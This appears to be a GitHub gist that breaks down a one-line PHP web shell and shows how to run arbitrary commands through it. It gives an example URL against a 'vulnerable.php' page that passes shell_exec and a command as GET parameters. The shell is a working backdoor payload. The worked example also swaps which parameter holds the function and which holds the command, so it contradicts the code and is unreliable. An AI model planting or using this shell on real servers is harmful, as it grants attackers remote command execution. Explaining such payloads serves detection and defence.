Last active
June 21, 2022 11:55
-
-
Save jaml/10436887 to your computer and use it in GitHub Desktop.
PHP explanation for <?=($_=@$_GET[2]).@$_($_GET[1])?>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?= PHP short opening tag | |
| ( | |
| $_ temporary variable | |
| = assignment (of temporary variable $_) | |
| @ suppress PHP errors | |
| $_GET[2] value corresponding to key 2 in array of values of HTTP GET (these are the arguments you see in a URL like ?argument1=foo&argument2=foo2) | |
| ) | |
| . concatenate | |
| @ | |
| $_( use whatever you got for $_ above as a function name called on argument $_GET[1] | |
| $_GET[1] key 1 of array of values returned by HTTP GET (used as an argument here) | |
| ) | |
| ?> PHP closing tag | |
| ----------------- | |
| So, for example, you could go to: targetsite.xxx/vulnerable.php?1=arg1&2=arg2 | |
| where | |
| arg1 = shell_exec (which is a PHP function that does what it sounds like) | |
| and | |
| arg2 = command of your choice. | |
| $_=@$_GET[2] -> $_ equals shell_exec here. | |
| $_($_GET[1]) -> Since $_=shell_exec, this is shell_exec($_GET[1]). $_GET[1]=arg2. | |
| Put it together, and you get shell_exec(arg2). | |
| You can also use keys other than 1 and 2 as in the code. Those were probably picked because they're easy to type. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment